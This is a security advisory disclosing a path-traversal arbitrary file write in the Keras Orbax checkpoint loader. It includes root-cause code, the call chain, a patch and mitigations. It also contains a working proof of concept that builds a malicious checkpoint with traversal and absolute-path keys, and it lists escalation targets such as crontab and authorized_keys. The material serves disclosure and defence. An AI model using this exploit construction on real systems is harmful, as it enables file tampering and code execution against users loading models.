[internal-id: KERAS-MFV-001] Arbitrary file write at default keras.saving.load_model via Orbax assets path traversal

Severity: CVSS 3.1 8.6 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H). Per-metric justification: AV:L (file delivery; locally readable by the loader); AC:L (default args, no preconditions); PR:N (no privileges required of the attacker); UI:R (the victim must call load_model on the directory); S:C (the write escapes the loader's intended tempfile.TemporaryDirectory() boundary, affecting other security domains); C/I/A:H (arbitrary file write at user privilege chains to RCE-tier outcomes). A network-delivered framing — model directory auto-fetched and loaded by an upstream agent or pipeline — yields AV:N and 9.6 Critical.
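The two scores quoted above can be reproduced from the CVSS 3.1 base-score equations. The sketch below is illustrative only: it hard-codes the specification's metric weights for just the values this vector uses, and the function names are hypothetical.

```python
import math

# Metric weights from the CVSS 3.1 specification, restricted to the values
# that appear in this advisory's vector (Scope: Changed throughout).
AV = {"N": 0.85, "L": 0.55}
AC_LOW = 0.77
PR_NONE = 0.85
UI_REQUIRED = 0.62
CIA_HIGH = 0.56


def roundup(value):
    """CVSS 3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_changed(attack_vector):
    """Base score for AV:<attack_vector>/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H."""
    iss = 1 - (1 - CIA_HIGH) ** 3
    impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = 8.22 * AV[attack_vector] * AC_LOW * PR_NONE * UI_REQUIRED
    return roundup(min(1.08 * (impact + exploitability), 10))


print(base_score_scope_changed("L"))  # 8.6 (local file delivery)
print(base_score_scope_changed("N"))  # 9.6 (network-delivered framing)
```

Only the Attack Vector weight changes between the two framings; every other term is shared.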

CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory — "Path Traversal") plus CWE-73 (External Control of File Name or Path). CWE-22 covers the relative-path (..) escape; CWE-73 covers the orthogonal absolute-path channel that bypasses os.path.join's base entirely.

Affected versions: Keras >= 3.14.0, <= 3.15.0 (HEAD 42b66280e). The Orbax loader was introduced in 40b910383 (#21903, 2026-01-12) and the assets checkpointable path through _write_nested_dict_to_dir in 449818056 (#22099, 2026-02-16). Both first ship in tag v3.14.0; HEAD declares __version__ = "3.15.0" and is still vulnerable.

Component: keras/src/saving/saving_lib.py (sink), keras/src/saving/saving_api.py (caller chain), keras/src/saving/orbax_util.py (auto-detection that opens the chain on default args).

Reporter: Independent security research.

Summary

keras.saving.load_model(filepath) silently dispatches to an Orbax checkpoint loader whenever filepath is a directory whose listing contains a purely-numeric subdirectory (an Orbax "step directory"). The loader extracts an assets checkpointable — an attacker-supplied nested dict[str, dict | np.ndarray] — and feeds it to saving_lib._write_nested_dict_to_dir, which materialises each leaf at os.path.join(base_dir, key) with no validation of the key. Because keys are fully attacker-controlled, both .. traversal ("../../etc/cron.d/evil") and absolute-path overrides ("/etc/cron.d/evil", where os.path.join discards base_dir) write attacker-chosen bytes to attacker-chosen paths at the loader process's privilege.

Any user, or automated pipeline, that calls the default keras.saving.load_model on an attacker-supplied directory gives the attacker arbitrary file write at the caller's own privilege level: a textbook RCE precursor via standard write-then-trigger gadgets.

Impact

  • Arbitrary file write at the loader process's privilege. Each leaf of the malicious assets dict is written with open(child_path, "wb").write(value.tobytes()); both path and bytes are fully attacker-controlled.
  • Both .. traversal and absolute-path keys are accepted. Verified in the PoC. Absolute keys bypass the base dir entirely with no .. segments, defeating naive "look for .." defences.
  • Reachable from the default public API. keras.saving.load_model("attacker_dir/") suffices. No flag changes, no safe_mode=False, no extra custom_objects=. is_orbax_checkpoint (orbax_util.py:11–47) fires on any directory containing a numeric-named subdirectory, so a trivial mkdir attacker_dir/0 opens the chain.
  • safe_mode=True does not help. safe_mode gates Lambda/object deserialisation deep inside _model_from_config; the assets-write fires on a separate code path that no existing flag mitigates.
  • Standard escalation to RCE. Arbitrary write as the user chains to code execution through well-known gadget categories: Python sitecustomize.py / .pth on the import path, user crontab / ~/.config/systemd/user/ unit, ~/.bashrc, ~/.ssh/authorized_keys, binary on $PATH. The advisory deliberately does not weaponise any of these.
  • Multi-tenant impact. Model-serving containers and notebook hosts that pass user-controlled paths to load_model (HuggingFace-style "load by repo id" agents, MLOps "import this checkpoint" flows) hand the uploading party arbitrary-write inside the serving process.

Affected Versions

  • First vulnerable release: Keras 3.14.0 (commits 40b910383 + 449818056, both first present at tag v3.14.0; verified with git merge-base --is-ancestor).
  • Last vulnerable release at time of writing: Keras 3.15.0 (HEAD 42b66280e). _write_nested_dict_to_dir is unchanged since introduction.
  • Reproduction confirmed at: HEAD 42b66280e (Phase 1 unit-level + Phase 2 reachability via keras.saving.load_model).

Pre-3.14 releases do not contain the Orbax loader and are not affected.
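As a quick triage aid, the range above can be checked against an installed version string. This is a minimal sketch: the helper name is hypothetical, the parsing is deliberately simple (it ignores pre-release suffixes), and the upper bound only reflects what was verified at the time of writing, so releases after 3.15.0 should be checked against the eventual fix rather than assumed safe.

```python
def is_affected_keras_version(version):
    """Return True if `version` falls in the range this advisory lists.

    Hypothetical helper: compares only the leading numeric part of the
    first three dot-separated components.
    """
    parts = []
    for piece in version.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    # Range taken from the advisory: >= 3.14.0 and <= 3.15.0.
    return (3, 14, 0) <= tuple(parts) <= (3, 15, 0)


for candidate in ("3.13.2", "3.14.0", "3.15.0"):
    print(candidate, is_affected_keras_version(candidate))
```

In practice the argument would be keras.__version__ from the environment under review.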

Vulnerability Details

Root cause

keras/src/saving/saving_lib.py:1776–1790:

def _write_nested_dict_to_dir(tree, base_dir):
    """Recursively write a nested dict of numpy arrays to a directory tree.

    Each dict key becomes a directory or filename. Leaf values (numpy
    arrays) are written as binary files.
    """
    for key, value in tree.items():
        child_path = os.path.join(base_dir, key)
        if isinstance(value, dict):
            os.makedirs(child_path, exist_ok=True)
            _write_nested_dict_to_dir(value, child_path)
        elif isinstance(value, np.ndarray):
            os.makedirs(os.path.dirname(child_path), exist_ok=True)
            with open(child_path, "wb") as f:
                f.write(value.tobytes())

The bug is that key is assumed to be a single path component (a "filename", per the docstring) but never enforced to be one. Three invariants fail simultaneously: (1) os.path.join(base_dir, key) returns key verbatim when key is absolute; (2) .. segments in key resolve child_path outside base_dir; (3) os.makedirs(os.path.dirname(child_path), exist_ok=True) happily creates intermediate directories along the escaped path. The save-side docstring at _save_assets_to_dict (saving_lib.py:1804–1806) ironically advertises the nested-dict representation as one that "avoids platform-specific path separator issues and zip-slip vulnerabilities" — precisely the class that exists on the load side, because the load side never re-validates.
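The first two failures can be observed without touching the filesystem. The following sketch is purely lexical: it uses posixpath so the result is the same on any platform, the helper name and the tempdir path are hypothetical, and symlinks are not considered.

```python
import posixpath


def escape_channel(base_dir, key):
    """Classify how joining `key` onto `base_dir` leaves `base_dir`, if at all.

    Returns (channel, resulting_path), where channel is "absolute",
    "traversal", or None when the result stays under base_dir.
    """
    joined = posixpath.join(base_dir, key)
    if posixpath.isabs(key):
        # join() discarded base_dir entirely and returned the key.
        return "absolute", joined
    resolved = posixpath.normpath(joined)
    base = posixpath.normpath(base_dir)
    if resolved != base and not resolved.startswith(base + "/"):
        return "traversal", resolved
    return None, resolved


base = "/tmp/tmpabc123"  # hypothetical TemporaryDirectory() path
for key in ("vocab.txt", "../../etc/cron.d/evil", "/etc/cron.d/evil"):
    print(repr(key), "->", escape_channel(base, key))
# 'vocab.txt' -> (None, '/tmp/tmpabc123/vocab.txt')
# '../../etc/cron.d/evil' -> ('traversal', '/etc/cron.d/evil')
# '/etc/cron.d/evil' -> ('absolute', '/etc/cron.d/evil')
```

Both hostile keys resolve to the same target, which is why a defence that only searches for .. segments is insufficient.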

Caller chain (reachability from public API)

  1. keras.saving.load_model(filepath) (re-exported as keras.models.load_model) — saving_api.py:181+.
  2. saving_api.py:202–209: if is_orbax_checkpoint(filepath): return _load_model_from_orbax_checkpoint(filepath, ...). No flag changes required.
  3. orbax_util.py:11–47: is_orbax_checkpoint returns True for any directory whose listing contains a digit-named subdirectory or any of the markers orbax.checkpoint, pytree.orbax-checkpoint, checkpoint_metadata, .orbax-checkpoint-tmp. The attacker owns the directory, so mkdir attacker_dir/0 is enough.
  4. saving_api.py:363–445: _load_model_from_orbax_checkpoint opens the checkpoint via ocp.training.Checkpointer and requests pytree, model_config, and (when present) assets (lines 426–427: if "assets" in saved_keys: request["assets"] = None).
  5. saving_api.py:443: saving_lib._load_assets_from_dict(model, assets_data) is called with the unvalidated nested dict round-tripped through Orbax storage.
  6. saving_lib.py:1856–1860: _load_assets_from_dict allocates a tempfile.TemporaryDirectory() and immediately calls _write_nested_dict_to_dir(assets_dict, tmp_dir). The vulnerability fires here, before the tempdir is read back.

grep -rn _load_assets_from_dict keras/ shows exactly one caller; patching at the sink closes the path.
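For defenders who want to know in advance whether a given directory would be routed down this chain, the detection rule described in step 3 can be approximated as below. This is a reimplementation of the prose description, not a copy of the Keras source; the function name is hypothetical, and matching markers by bare entry name is an assumption.

```python
import os
import tempfile

# Marker names as listed in step 3 of the caller chain.
ORBAX_MARKERS = {
    "orbax.checkpoint",
    "pytree.orbax-checkpoint",
    "checkpoint_metadata",
    ".orbax-checkpoint-tmp",
}


def would_take_orbax_path(path):
    """Approximate the described Orbax auto-detection for a local directory."""
    if not os.path.isdir(path):
        return False
    for name in os.listdir(path):
        if name in ORBAX_MARKERS:
            return True
        # A purely numeric subdirectory is treated as an Orbax step directory.
        if name.isdigit() and os.path.isdir(os.path.join(path, name)):
            return True
    return False


with tempfile.TemporaryDirectory() as root:
    print(would_take_orbax_path(root))  # False: empty directory
    os.mkdir(os.path.join(root, "0"))
    print(would_take_orbax_path(root))  # True: numeric subdirectory present
```

A pipeline that only expects .keras or .h5 files could use a check of this shape to refuse directories outright before calling load_model.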

Why safe_mode does not protect

safe_mode=True is the Keras knob for refusing untrusted Lambda layers and untrusted __class__ references during config deserialisation; that gate lives inside _model_from_config / deserialize_keras_object, called by _load_model_from_orbax_checkpoint at saving_api.py:413. The arbitrary file write happens later, at saving_api.py:443, on a sibling code path that the gate never inspects, so flipping safe_mode either way has no effect.

Proof of Concept

The PoC at /home/zitu/mfv/poc/T1B/ reproduces the bug end-to-end in a sealed docker container, writing only a benign sentinel file (poc-marker-T1B-reach).

Environment

Docker image keras-poc:t1b (Python 3.11 + jax-cpu + numpy + orbax-checkpoint 0.11.x + h5py). Keras source mounted read-only at /keras-src; PoC volume mounted at /poc.

Build malicious artifact

/home/zitu/mfv/poc/T1B/run.py --build-only writes a real Orbax checkpoint whose assets checkpointable carries a path-traversal key. The essential payload:

import numpy as np, keras
from orbax.checkpoint import v1 as ocp
from keras.src.saving import saving_lib

model = keras.Sequential(
    [keras.layers.Input(shape=(2,)), keras.layers.Dense(2)]
)
model.compile(optimizer="adam", loss="mse")
model.fit(np.zeros((1, 2)), np.zeros((1, 2)), epochs=1, verbose=0)
config_json, _ = saving_lib._serialize_model_as_json(model)

# Poisoned key escapes the tempfile.TemporaryDirectory() (e.g. /tmp/tmpXXXX).
malicious_assets = {
    "../../poc/poc-marker-T1B-reach": np.array(
        [0x52, 0x45, 0x41, 0x43, 0x48, 0x0A], dtype=np.uint8  # "REACH\n"
    )
}
payload = {
    "pytree": model.get_state_tree(),
    "model_config": {"config": config_json},
    "assets": malicious_assets,
}

checkpointer = ocp.training.Checkpointer(directory="/poc/evil_orbax")
with ocp.Context():
    checkpointer.save_checkpointables(0, payload)
checkpointer.wait_until_finished(); checkpointer.close()

The malicious dict round-trips through Orbax CompositeCheckpointHandler without sanitisation (key preserved verbatim in _strings.json on disk). An equally effective variant uses an absolute-path key ({"/etc/cron.d/evil": np.array([...], dtype=np.uint8)}) — os.path.join drops the base dir, no .. involved (the CWE-73 channel).

Trigger

docker run --rm --user $(id -u):$(id -g) \
    -v /home/zitu/mfv/keras:/keras-src:ro \
    -v /home/zitu/mfv/poc/T1B:/poc \
    -e PYTHONPATH=/keras-src -e KERAS_BACKEND=jax -e HOME=/tmp \
    keras-poc:t1b python /poc/run.py

Inside the container the PoC then runs keras.saving.load_model("/poc/evil_orbax") with all default arguments.

Expected evidence

calling _write_nested_dict_to_dir with key '../poc-marker-T1B-unit'
  base_dir = '/poc/sandbox'
  /poc/ contents:
    FILE /poc/poc-marker-T1B-unit  (4 bytes)
    DIR  /poc/sandbox
  /poc/sandbox/ contents: (empty)
[Phase 1] CONFIRMED: file landed OUTSIDE base_dir at /poc/poc-marker-T1B-unit
  contents = b'POC\n'
...
  saved evil orbax checkpoint at /poc/evil_orbax
  invoking keras.saving.load_model() on the evil checkpoint…
  load_model() returned without raising
  /poc/ contents after load_model():
    FILE /poc/poc-marker-T1B-reach  (6 bytes)
[Phase 2] REACHABLE: marker landed OUTSIDE the load tmpdir at /poc/poc-marker-T1B-reach
  contents = b'REACH\n'

load_model() returns successfully (the model object is even usable); the side effect is silent.

Suggested Patch

Fix at the sink. Validate every key as a single well-formed path component, then realpath-check the resolved child path. Complete diff against keras/src/saving/saving_lib.py at HEAD 42b66280e (validated with git apply --check):

--- a/keras/src/saving/saving_lib.py
+++ b/keras/src/saving/saving_lib.py
@@ -1773,18 +1773,62 @@ def _split_path_components(path):
     return parts
 
 
+def _is_safe_assets_key(key):
+    """Return True iff ``key`` is a single safe pathname component.
+
+    Rejects empty strings, ``.``/``..`` segments, absolute paths, embedded
+    path separators (POSIX or Windows), and NUL bytes. The intent is that
+    each ``key`` in an assets nested-dict be a *filename*, never a path.
+    """
+    if not isinstance(key, str) or not key:
+        return False
+    if "\x00" in key:
+        return False
+    if os.path.isabs(key):
+        return False
+    # Disallow any path separator on either platform, plus drive letters
+    # of the form "C:..." which Windows treats specially in os.path.join.
+    if "/" in key or "\\" in key:
+        return False
+    if len(key) >= 2 and key[1] == ":":
+        return False
+    if key in (".", ".."):
+        return False
+    return True
+
+
 def _write_nested_dict_to_dir(tree, base_dir):
     """Recursively write a nested dict of numpy arrays to a directory tree.
 
     Each dict key becomes a directory or filename. Leaf values (numpy
     arrays) are written as binary files.
+
+    Keys are validated to be single safe filename components: keys
+    containing path separators, ``..`` segments, drive letters, NUL
+    bytes, or absolute paths are rejected. As defence-in-depth the
+    resolved child path is also required to stay under ``base_dir``.
     """
+    base_dir_real = os.path.realpath(base_dir)
     for key, value in tree.items():
+        if not _is_safe_assets_key(key):
+            raise ValueError(
+                f"Unsafe key in assets dict: {key!r}. Asset keys must be "
+                "single filename components without separators or "
+                "traversal segments."
+            )
         child_path = os.path.join(base_dir, key)
+        child_real = os.path.realpath(child_path)
+        if child_real != base_dir_real and not child_real.startswith(
+            base_dir_real + os.sep
+        ):
+            raise ValueError(
+                f"Path escape in assets dict: {key!r} resolves to "
+                f"{child_real!r} which is outside {base_dir_real!r}."
+            )
         if isinstance(value, dict):
             os.makedirs(child_path, exist_ok=True)
             _write_nested_dict_to_dir(value, child_path)
         elif isinstance(value, np.ndarray):
             os.makedirs(os.path.dirname(child_path), exist_ok=True)
             with open(child_path, "wb") as f:
                 f.write(value.tobytes())

Notes for the patch reviewer:

  • The validator rejects POSIX/Windows separators, drive letters, NUL, absolute paths, and the . and .. segments. Legitimate assets produced by _save_assets_to_dict (saving_lib.py:1793–1841) are structurally guaranteed not to contain any of these, because they come from _split_path_components(os.path.relpath(...)) on a directory walk, so the validator never rejects a Keras-produced checkpoint.
  • The realpath check is defence-in-depth against future call sites or symlink races; redundant but cheap on the current site.
  • ValueError matches surrounding Keras style. Add a test in saving_lib_test.py that pins pytest.raises(ValueError) for keys ("../escape", "/etc/passwd", "a/b", "..", ".", "x\x00y").

Mitigations (interim)

Until a fixed Keras is published, and afterwards for users who cannot upgrade:

  • Do not pass untrusted directories to keras.saving.load_model. The Orbax detection fires on any directory with a numeric-named subdirectory, so attacker-supplied "model folders" trigger the path even when they don't look like Orbax checkpoints.
  • Sandbox the loader process under bubblewrap / firejail / a rootless container with a read-only rootfs, or a seccomp filter that denies openat(O_CREAT) outside the model staging directory.
  • Validate the assets sub-tree before loading: open the checkpoint via orbax-checkpoint directly, audit the assets dict's keys (reject empty, .., /, \\, NUL, :, absolute), then delegate to keras.saving.load_model only when clean.
  • Pin Keras to < 3.14.0 if downgrading is acceptable; removes the entire affected code path.
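The key audit in the third mitigation can be sketched as a recursive walk over the nested dict. This assumes the assets dict has already been read from the checkpoint by some other means (how to do that with orbax-checkpoint is not shown here); the function name is hypothetical, and the example uses bytes placeholders where real leaves would be numpy arrays.

```python
def find_unsafe_asset_keys(assets, _prefix=()):
    """Return the key paths in a nested assets dict that break the audit rules.

    A key is flagged if it is not a string, is empty, is "." or "..", or
    contains "/", "\\", NUL, or ":" (which also covers absolute paths and
    Windows drive letters).
    """
    unsafe = []
    for key, value in assets.items():
        path = _prefix + (key,)
        bad = (
            not isinstance(key, str)
            or key in ("", ".", "..")
            or any(ch in key for ch in ("/", "\\", "\x00", ":"))
        )
        if bad:
            unsafe.append(path)
        if isinstance(value, dict):
            unsafe.extend(find_unsafe_asset_keys(value, path))
    return unsafe


# Illustrative input; leaf values are placeholders.
assets = {
    "vocab": {"tokens.txt": b"..."},
    "../../poc/marker": b"x",
    "nested": {"/etc/cron.d/evil": b"x"},
}
print(find_unsafe_asset_keys(assets))
# [('../../poc/marker',), ('nested', '/etc/cron.d/evil')]
```

An empty result is the condition under which the directory would be handed on to keras.saving.load_model; anything else should be treated as a hostile checkpoint and rejected.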

Credits

Reported by Independent security research (academic vulnerability research project, NTU, contact ziyu.lin@ntu.edu.sg), 2026-05-04.

Timeline

  • 2026-05-04: Vulnerability discovered; primitive confirmed at _write_nested_dict_to_dir; reachability via keras.saving.load_model confirmed end-to-end inside docker; absolute-path variant confirmed.
  • TBD: Reported privately to keras-security@google.com and via GHSA private vulnerability report against keras-team/keras.
  • TBD: Patch released and CVE assigned.
  • TBD: 90-day public disclosure.

References

  • CWE-22 — Path Traversal: https://cwe.mitre.org/data/definitions/22.html
  • CWE-73 — External Control of File Name or Path: https://cwe.mitre.org/data/definitions/73.html
  • Commit introducing the Orbax loader: 40b910383 ("Orbax Loading and Sharding Support feature (#21903)").
  • Commit introducing the assets dict path: 449818056 ("Add assets support to OrbaxCheckpoint using checkpointables API (#22099)").
  • Related (different class, same component family): CVE-2026-1669 (Keras H5 external dataset file-read). The H5 advisory describes a read primitive; this advisory describes a write primitive in a sibling code path.
  • Bug-class precedent: "Zip Slip" disclosure (Snyk, 2018); CVE-2007-4559 (Python tarfile traversal).